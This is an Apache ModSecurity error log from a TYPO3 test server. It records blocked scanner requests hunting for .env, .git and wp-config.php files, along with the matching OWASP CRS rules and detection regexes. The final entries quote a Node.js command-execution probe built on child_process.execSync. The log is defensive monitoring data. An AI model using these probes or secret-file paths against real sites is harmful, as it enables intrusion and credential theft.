[Mon Jan 26 19:22:43.335711 2026] [authz_core:error] [pid 1670859] [client 195.178.110.132:32880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jan 26 22:12:31.865651 2026] [:error] [pid 1677409] [client 185.177.72.60:9758] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aXfYv5940sjFbKiNzmHy2AAAAAA"]
[Mon Jan 26 22:12:31.865926 2026] [:error] [pid 1677409] [client 185.177.72.60:9758] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aXfYv5940sjFbKiNzmHy2AAAAAA"]
[Mon Jan 26 22:12:31.866107 2026] [:error] [pid 1677409] [client 185.177.72.60:9758] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aXfYv5940sjFbKiNzmHy2AAAAAA"]
[Mon Jan 26 22:12:31.866357 2026] [:error] [pid 1677410] [client 185.177.72.60:9764] [client 185.177.72.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aXfYv0vEoeB8THj2IAUKNgAAAAE"]
[Mon Jan 26 22:12:31.866572 2026] [:error] [pid 1677410] [client 185.177.72.60:9764] [client 185.177.72.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aXfYv0vEoeB8THj2IAUKNgAAAAE"]
[Mon Jan 26 22:12:31.866726 2026] [:error] [pid 1677410] [client 185.177.72.60:9764] [client 185.177.72.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aXfYv0vEoeB8THj2IAUKNgAAAAE"]
[Mon Jan 26 22:12:34.072468 2026] [authz_core:error] [pid 1677415] [client 185.177.72.60:9778] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Tue Jan 27 03:40:34.975366 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglosG5zMvAPnagSx0HogAAAAA"]
[Tue Jan 27 03:40:34.975520 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglosG5zMvAPnagSx0HogAAAAA"]
[Tue Jan 27 03:40:34.975681 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglosG5zMvAPnagSx0HogAAAAA"]
[Tue Jan 27 03:40:35.291588 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglo8G5zMvAPnagSx0HqgAAAAA"]
[Tue Jan 27 03:40:35.291802 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglo8G5zMvAPnagSx0HqgAAAAA"]
[Tue Jan 27 03:40:35.291986 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXglo8G5zMvAPnagSx0HqgAAAAA"]
[Tue Jan 27 03:40:35.312665 2026] [authz_core:error] [pid 1683147] [client 195.178.110.132:39674] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Tue Jan 27 03:40:35.333991 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXglo8G5zMvAPnagSx0HrAAAAAA"]
[Tue Jan 27 03:40:35.334191 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXglo8G5zMvAPnagSx0HrAAAAAA"]
[Tue Jan 27 03:40:35.334375 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXglo8G5zMvAPnagSx0HrAAAAAA"]
[Tue Jan 27 03:40:35.355468 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXglo8G5zMvAPnagSx0HrQAAAAA"]
[Tue Jan 27 03:40:35.355675 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXglo8G5zMvAPnagSx0HrQAAAAA"]
[Tue Jan 27 03:40:35.355836 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXglo8G5zMvAPnagSx0HrQAAAAA"]
[Tue Jan 27 03:40:35.376809 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXglo8G5zMvAPnagSx0HrgAAAAA"]
[Tue Jan 27 03:40:35.377002 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXglo8G5zMvAPnagSx0HrgAAAAA"]
[Tue Jan 27 03:40:35.377151 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXglo8G5zMvAPnagSx0HrgAAAAA"]
[Tue Jan 27 03:40:35.397751 2026] [authz_core:error] [pid 1683147] [client 195.178.110.132:39674] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jan 27 03:40:35.419177 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXglo8G5zMvAPnagSx0HsAAAAAA"]
[Tue Jan 27 03:40:35.419432 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXglo8G5zMvAPnagSx0HsAAAAAA"]
[Tue Jan 27 03:40:35.419580 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXglo8G5zMvAPnagSx0HsAAAAAA"]
[Tue Jan 27 03:40:35.440529 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglo8G5zMvAPnagSx0HsQAAAAA"]
[Tue Jan 27 03:40:35.440671 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglo8G5zMvAPnagSx0HsQAAAAA"]
[Tue Jan 27 03:40:35.440855 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglo8G5zMvAPnagSx0HsQAAAAA"]
[Tue Jan 27 03:40:35.441001 2026] [:error] [pid 1683147] [client 195.178.110.132:39674] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXglo8G5zMvAPnagSx0HsQAAAAA"]
[Tue Jan 27 03:40:35.499062 2026] [authz_core:error] [pid 1683147] [client 195.178.110.132:39674] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Tue Jan 27 03:40:35.637081 2026] [authz_core:error] [pid 1683147] [client 195.178.110.132:39674] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jan 27 03:40:35.658267 2026] [authz_core:error] [pid 1683147] [client 195.178.110.132:39674] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jan 28 01:20:36.061487 2026] [:error] [pid 1701188] [client 204.76.203.25:42200] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXlWVLdyn2NhPPwazymlBAAAAAQ"]
[Wed Jan 28 01:20:36.062604 2026] [:error] [pid 1701188] [client 204.76.203.25:42200] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXlWVLdyn2NhPPwazymlBAAAAAQ"]
[Wed Jan 28 01:20:36.062793 2026] [:error] [pid 1701188] [client 204.76.203.25:42200] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXlWVLdyn2NhPPwazymlBAAAAAQ"]
[Sun Feb 01 14:48:46.205928 2026] [authz_core:error] [pid 1802384] [client 34.125.149.155:38436] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Feb 02 12:22:15.697113 2026] [:error] [pid 1813899] [client 204.76.203.25:54468] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYCI5_CpX0LW2-Z2u5-lngAAAAg"]
[Mon Feb 02 12:22:15.697366 2026] [:error] [pid 1813899] [client 204.76.203.25:54468] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYCI5_CpX0LW2-Z2u5-lngAAAAg"]
[Mon Feb 02 12:22:15.697531 2026] [:error] [pid 1813899] [client 204.76.203.25:54468] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYCI5_CpX0LW2-Z2u5-lngAAAAg"]
[Tue Feb 03 13:06:12.947532 2026] [:error] [pid 1833927] [client 195.178.110.33:36862] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aYHktBcScgBearvs1jYciQAAAAQ"]
[Tue Feb 03 13:06:12.948101 2026] [:error] [pid 1833927] [client 195.178.110.33:36862] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aYHktBcScgBearvs1jYciQAAAAQ"]
[Tue Feb 03 13:06:12.948282 2026] [:error] [pid 1833927] [client 195.178.110.33:36862] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aYHktBcScgBearvs1jYciQAAAAQ"]
